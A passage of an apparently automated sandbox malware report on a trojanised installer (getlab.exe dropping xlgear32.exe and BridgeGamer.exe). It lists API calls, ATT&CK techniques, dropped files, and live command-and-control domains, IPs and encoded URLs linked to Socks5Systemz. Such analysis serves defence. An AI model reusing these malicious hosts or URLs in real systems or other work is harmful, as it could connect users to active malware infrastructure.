                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6096748C sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_reset,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_bind_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_reset,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_realloc,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,4_2_6096748C
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_609254B1 sqlite3_bind_zeroblob,sqlite3_mutex_leave,4_2_609254B1
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6094B407 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,4_2_6094B407
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6090F435 sqlite3_bind_parameter_index,4_2_6090F435
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_609255D4 sqlite3_mutex_leave,sqlite3_bind_text16,4_2_609255D4
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_609255FF sqlite3_bind_text,4_2_609255FF
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6096A5EE sqlite3_value_text,sqlite3_value_bytes,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_malloc,sqlite3_column_int,sqlite3_column_int64,sqlite3_column_text,sqlite3_column_bytes,sqlite3_finalize,sqlite3_step,sqlite3_free,sqlite3_finalize,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_column_int64,sqlite3_column_int,sqlite3_column_text,sqlite3_column_bytes,sqlite3_step,sqlite3_finalize,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_malloc,sqlite3_bind_null,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_value_text,sqlite3_value_bytes,sqlite3_free,4_2_6096A5EE
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6094B54C sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,memmove,4_2_6094B54C
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_60925686 sqlite3_bind_int64,sqlite3_mutex_leave,4_2_60925686
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6094A6C5 sqlite3_bind_int64,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_malloc,sqlite3_reset,sqlite3_free,4_2_6094A6C5
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_609256E5 sqlite3_bind_int,sqlite3_bind_int64,4_2_609256E5
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6094B6ED sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,4_2_6094B6ED
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6092562A sqlite3_bind_blob,4_2_6092562A
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_60925655 sqlite3_bind_null,sqlite3_mutex_leave,4_2_60925655
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6094C64A sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,4_2_6094C64A
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_609687A7 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_column_int64,sqlite3_reset,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,4_2_609687A7
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6095F7F7 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,4_2_6095F7F7
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6092570B sqlite3_bind_double,sqlite3_mutex_leave,4_2_6092570B
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6095F772 sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,4_2_6095F772
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_60925778 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,4_2_60925778
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6090577D sqlite3_bind_parameter_name,4_2_6090577D
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6094B764 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,4_2_6094B764
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6090576B sqlite3_bind_parameter_count,4_2_6090576B
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6094A894 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,4_2_6094A894
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6095F883 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,4_2_6095F883
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6094C8C2 sqlite3_value_int,sqlite3_value_int,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_null,sqlite3_bind_null,sqlite3_step,sqlite3_reset,4_2_6094C8C2
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6096281E sqlite3_mprintf,sqlite3_vtab_config,sqlite3_malloc,sqlite3_mprintf,sqlite3_mprintf,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_exec,sqlite3_free,sqlite3_prepare_v2,sqlite3_bind_text,sqlite3_step,sqlite3_column_int64,sqlite3_finalize,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_errmsg,sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_free,sqlite3_declare_vtab,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,4_2_6096281E
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6096583A memcmp,sqlite3_realloc,qsort,sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_step,sqlite3_reset,4_2_6096583A
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6095F9AD sqlite3_bind_int,sqlite3_step,sqlite3_column_type,sqlite3_reset,4_2_6095F9AD
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6094A92B sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,4_2_6094A92B
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6090EAE5 sqlite3_transfer_bindings,4_2_6090EAE5
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6095FB98 sqlite3_value_int,sqlite3_bind_int,sqlite3_bind_value,sqlite3_step,sqlite3_reset,4_2_6095FB98
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6095ECA6 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,4_2_6095ECA6
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6095FCCE sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,4_2_6095FCCE
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6095FDAE sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,4_2_6095FDAE
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_60966DF1 sqlite3_value_text,sqlite3_mprintf,sqlite3_free,strcmp,sqlite3_free,sqlite3_malloc,sqlite3_bind_int64,sqlite3_step,sqlite3_column_type,sqlite3_reset,sqlite3_column_blob,sqlite3_reset,sqlite3_malloc,sqlite3_free,sqlite3_reset,sqlite3_result_error_code,sqlite3_result_blob,4_2_60966DF1
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_60969D75 sqlite3_bind_int,sqlite3_step,sqlite3_column_int,sqlite3_reset,4_2_60969D75
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6095FFB2 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,4_2_6095FFB2

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
                    Native API                    		1
                    DLL Side-Loading                    		1
                    Exploitation for Privilege Escalation                    		1
                    Deobfuscate/Decode Files or Information                    		1
                    Input Capture                    		1
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		2
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts2
                    Service Execution                    		5
                    Windows Service                    		1
                    DLL Side-Loading                    		3
                    Obfuscated Files or Information                    		LSASS Memory1
                    Account Discovery                    		Remote Desktop Protocol1
                    Input Capture                    		2
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt1
                    Bootkit                    		1
                    Access Token Manipulation                    		21
                    Software Packing                    		Security Account Manager2
                    File and Directory Discovery                    		SMB/Windows Admin SharesData from Network Shared Drive1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook5
                    Windows Service                    		1
                    DLL Side-Loading                    		NTDS35
                    System Information Discovery                    		Distributed Component Object ModelInput Capture2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
                    Process Injection                    		1
                    Masquerading                    		LSA Secrets151
                    Security Software Discovery                    		SSHKeylogging112
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts121
                    Virtualization/Sandbox Evasion                    		Cached Domain Credentials1
                    Process Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Access Token Manipulation                    		DCSync121
                    Virtualization/Sandbox Evasion                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                    Process Injection                    		Proc Filesystem11
                    Application Window Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Bootkit                    		/etc/passwd and /etc/shadow3
                    System Owner/User Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    Remote System Discovery                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                    System Network Configuration Discovery                    		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1565505 Sample: getlab.exe Startdate: 30/11/2024 Architecture: WINDOWS Score: 100 42 Suricata IDS alerts for network traffic 2->42 44 Found malware configuration 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 8 other signatures 2->48 8 getlab.exe 2 2->8         started        process3 file4 24 C:\Users\user\AppData\Local\...\getlab.tmp, PE32 8->24 dropped 11 getlab.tmp 18 18 8->11         started        process5 file6 26 C:\Users\user\AppData\Local\...\xlgear32.exe, PE32 11->26 dropped 28 C:\Users\user\AppData\...\unins000.exe (copy), PE32 11->28 dropped 30 C:\Users\user\AppData\Local\...\is-UJ38T.tmp, PE32 11->30 dropped 32 17 other files (10 malicious) 11->32 dropped 14 xlgear32.exe 1 20 11->14         started        18 net.exe 1 11->18         started        process7 dnsIp8 38 ayeyoji.ru 185.208.158.202, 49736, 49746, 49752 SIMPLECARRER2IT Switzerland 14->38 40 89.105.201.183, 2023, 49737, 49745 NOVOSERVE-ASNL Netherlands 14->40 34 C:\ProgramData\BridgeGamer\sqlite3.dll, PE32 14->34 dropped 36 C:\ProgramData\BridgeGamer\BridgeGamer.exe, PE32 14->36 dropped 20 conhost.exe 18->20         started        22 net1.exe 1 18->22         started        file9 process10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    getlab.exe18%ReversingLabsWin32.Trojan.Munp
                    getlab.exe37%VirustotalBrowse

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\ProgramData\BridgeGamer\BridgeGamer.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe100%Joe Sandbox ML
                    C:\ProgramData\BridgeGamer\sqlite3.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\is-48NRD.tmp\_isetup\_iscrypt.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\is-48NRD.tmp\_isetup\_setup64.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\is-48NRD.tmp\_isetup\_shfoldr.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\XLGear 3.1.3.157\LTDIS13n.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\XLGear 3.1.3.157\bjpeg23.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\XLGear 3.1.3.157\gdiplus.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-4GRQU.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-B16F3.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-GH467.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-K4GKL.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-NVVDJ.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-Q00OL.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-VVRBT.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\XLGear 3.1.3.157\ltkrn13n.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\XLGear 3.1.3.157\msvcp71.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\XLGear 3.1.3.157\msvcr71.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\XLGear 3.1.3.157\sqlite3.dll (copy)0%ReversingLabs

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://185.208.158.202/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec9580%Avira URL Cloudsafe
                    https://www.easycutstudio.com/support.html0%Avira URL Cloudsafe
                    ayeyoji.ru0%Avira URL Cloudsafe
                    http://www.zldo.narod.ru/plugins.html0%Avira URL Cloudsafe
                    http://ayeyoji.ru/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c445db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfd18c3ef9199330%Avira URL Cloudsafe
                    http://ayeyoji.ru/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    ayeyoji.ru
                    		185.208.158.202
                    		truetrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      ayeyoji.rutrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://ayeyoji.ru/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c445db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfd18c3ef919933true
                      • Avira URL Cloud: safe
                      		unknown
                      http://ayeyoji.ru/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951etrue
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://185.208.158.202/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958xlgear32.exe, 00000004.00000002.2937621128.00000000033D3000.00000004.00000020.00020000.00000000.sdmp, xlgear32.exe, 00000004.00000002.2937742375.000000000345C000.00000004.00000020.00020000.00000000.sdmp, xlgear32.exe, 00000004.00000002.2937621128.00000000033A7000.00000004.00000020.00020000.00000000.sdmp, xlgear32.exe, 00000004.00000002.2937621128.00000000033A2000.00000004.00000020.00020000.00000000.sdmp, xlgear32.exe, 00000004.00000002.2936299565.00000000008C8000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.innosetup.com/getlab.tmp, getlab.tmp, 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-UJ38T.tmp.1.dr, getlab.tmp.0.drfalse
                        		high
                        http://www.remobjects.com/psUgetlab.exe, 00000000.00000003.1677005829.0000000002268000.00000004.00001000.00020000.00000000.sdmp, getlab.exe, 00000000.00000003.1676863015.0000000002490000.00000004.00001000.00020000.00000000.sdmp, getlab.tmp, 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-UJ38T.tmp.1.dr, getlab.tmp.0.drfalse
                          		high
                          http://www.remobjects.com/psgetlab.exe, 00000000.00000003.1677005829.0000000002268000.00000004.00001000.00020000.00000000.sdmp, getlab.exe, 00000000.00000003.1676863015.0000000002490000.00000004.00001000.00020000.00000000.sdmp, getlab.tmp, getlab.tmp, 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-UJ38T.tmp.1.dr, getlab.tmp.0.drfalse
                            		high
                            https://www.easycutstudio.com/support.htmlgetlab.exe, 00000000.00000002.2936190021.0000000002261000.00000004.00001000.00020000.00000000.sdmp, getlab.exe, 00000000.00000003.1676529645.0000000002261000.00000004.00001000.00020000.00000000.sdmp, getlab.exe, 00000000.00000003.1676461165.0000000002490000.00000004.00001000.00020000.00000000.sdmp, getlab.tmp, 00000001.00000003.1678285601.0000000003110000.00000004.00001000.00020000.00000000.sdmp, getlab.tmp, 00000001.00000002.2936078014.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, getlab.tmp, 00000001.00000003.1678355074.0000000002168000.00000004.00001000.00020000.00000000.sdmp, getlab.tmp, 00000001.00000002.2936394282.0000000002168000.00000004.00001000.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://185.208.158.202/xlgear32.exe, 00000004.00000002.2936299565.00000000008FB000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://185.208.158.202/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82dxlgear32.exe, 00000004.00000002.2936299565.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, xlgear32.exe, 00000004.00000002.2936299565.00000000008FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://www.zldo.narod.ru/plugins.htmlgetlab.tmp, 00000001.00000002.2936760839.00000000059A3000.00000004.00001000.00020000.00000000.sdmp, xlgear32.exe, 00000004.00000000.1689308145.00000000004CA000.00000002.00000001.01000000.00000008.sdmp, BridgeGamer.exe.4.dr, is-S3UFM.tmp.1.dr, xlgear32.exe.1.drfalse
                                • Avira URL Cloud: safe
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                185.208.158.202
                                		ayeyoji.ruSwitzerland
                                		34888SIMPLECARRER2ITtrue
                                89.105.201.183
                                		unknownNetherlands
                                		24875NOVOSERVE-ASNLfalse

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1565505
                                Start date and time:2024-11-30 02:32:05 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 6m 4s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:10
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:getlab.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@10/31@1/2
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 92%
                                • Number of executed functions: 196
                                • Number of non-executed functions: 269
                                Cookbook Comments:
                                • Found application associated with file extension: .exe

                                Warnings

                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                • Report size getting too big, too many NtQueryValueKey calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                20:33:32API Interceptor557977x Sleep call for process: xlgear32.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                185.208.158.202file.exeGet hashmaliciousNymaim, Socks5SystemzBrowse
                                  i7j22nof2Q.exeGet hashmaliciousSocks5SystemzBrowse
                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                      file.exeGet hashmaliciousSocks5SystemzBrowse
                                        file.exeGet hashmaliciousSocks5SystemzBrowse
                                          file.exeGet hashmaliciousSocks5SystemzBrowse
                                            gxjIKuKnu7.exeGet hashmaliciousSocks5SystemzBrowse
                                              OFjT8HmzFJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                BJqvg1iEdr.exeGet hashmaliciousSocks5SystemzBrowse
                                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Socks5Systemz, Stealc, VidarBrowse
                                                    89.105.201.183OFjT8HmzFJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                    • 404
                                                    N6jsQ3XNNX.exeGet hashmaliciousSocks5SystemzBrowse
                                                    • 200
                                                    cv viewer plugin 8.31.40.exeGet hashmaliciousSocks5SystemzBrowse
                                                    • 200

                                                    Domains

                                                    No context

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    SIMPLECARRER2ITchutmarao.ps1Get hashmaliciousRHADAMANTHYSBrowse
                                                    • 185.196.8.68
                                                    RjygH3Vh7O.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                    • 185.196.8.68
                                                    SekpL8Z26C.exeGet hashmaliciousUnknownBrowse
                                                    • 185.208.159.79
                                                    file.exeGet hashmaliciousUnknownBrowse
                                                    • 185.208.159.79
                                                    file.exeGet hashmaliciousUnknownBrowse
                                                    • 185.208.159.79
                                                    file.exeGet hashmaliciousNymaim, Socks5SystemzBrowse
                                                    • 185.208.158.202
                                                    http://itrack4.valuecommerce.ne.jp/cgi-bin/2366370/entry.php?vc_url=http://serviceoctopus.comGet hashmaliciousHTMLPhisherBrowse
                                                    • 185.208.158.251
                                                    0a0#U00a0.jsGet hashmaliciousRHADAMANTHYSBrowse
                                                    • 185.196.8.68
                                                    i7j22nof2Q.exeGet hashmaliciousSocks5SystemzBrowse
                                                    • 185.208.158.202
                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                    • 185.208.158.202
                                                    NOVOSERVE-ASNLfile.exeGet hashmaliciousNymaim, Socks5SystemzBrowse
                                                    • 89.105.201.183
                                                    i7j22nof2Q.exeGet hashmaliciousSocks5SystemzBrowse
                                                    • 89.105.201.183
                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                    • 89.105.201.183
                                                    file.exeGet hashmaliciousSocks5SystemzBrowse
                                                    • 89.105.201.183
                                                    file.exeGet hashmaliciousSocks5SystemzBrowse
                                                    • 89.105.201.183
                                                    file.exeGet hashmaliciousSocks5SystemzBrowse
                                                    • 89.105.201.183
                                                    gxjIKuKnu7.exeGet hashmaliciousSocks5SystemzBrowse
                                                    • 89.105.201.183
                                                    OFjT8HmzFJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                    • 89.105.201.183
                                                    BJqvg1iEdr.exeGet hashmaliciousSocks5SystemzBrowse
